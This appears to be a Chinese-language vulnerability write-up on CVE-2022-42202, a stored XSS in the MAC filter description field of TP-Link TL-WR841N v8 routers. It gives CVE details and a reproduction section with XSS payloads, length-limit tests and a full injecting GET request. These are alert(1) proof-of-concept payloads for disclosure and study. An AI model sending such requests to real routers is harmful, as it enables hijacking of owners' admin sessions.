前言
CVE-2022-42202漏洞介绍
基本信息
项 | 内容 |
CVE 编号 | CVE-2022-42202 |
漏洞类型 | 存储型 XSS(CWE-79),根因是输出编码不当(CWE-116) |
CVSS 3.1 | 6.1 中危 · AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
受影响型号 | TP-Link TL-WR841N v8(硬件版本 8.0) |
受影响固件 | 4.17.16 Build 120201 Rel.54750n(2012-02-01 编译) |
注入点 | /userRpm/WlanMacFilterRpm.htm 的 Desc(描述)字段 |
输出点 | 同一文件内的 document.write('<td> ' + wlanFilterList[row+4] + '</td>') |
披露时间 | 2022-10-18(MITRE);最后修订 2026-06-17 |
EPSS | 约 0.1% – 0.4%(很低,未被规模化利用) |
TP-Link TL-WR841N 8.0 4.17.16 Build 120201 Rel.54750n is vulnerable to Cross Site Scripting (XSS).
复现过程

输入 | 结果 |
<svg onload=alert(1)> | 通过 |
<img src=x onerror=alert(1)> | 通过 |
<script>alert(1)</script> | 通过 |
A × 31 | 拒绝 |
中 × 15(宽度恰好 30) | 通过 |
GET /userRpm/WlanMacFilterRpm.htm?Mac=00-11-22-33-44-77&Desc=%3Csvg%20onload%3Dalert(1)%3E&entryEnabled=1&Changed=0&SelIndex=0&Page=1&Save=%B1%A3%20%B4%E6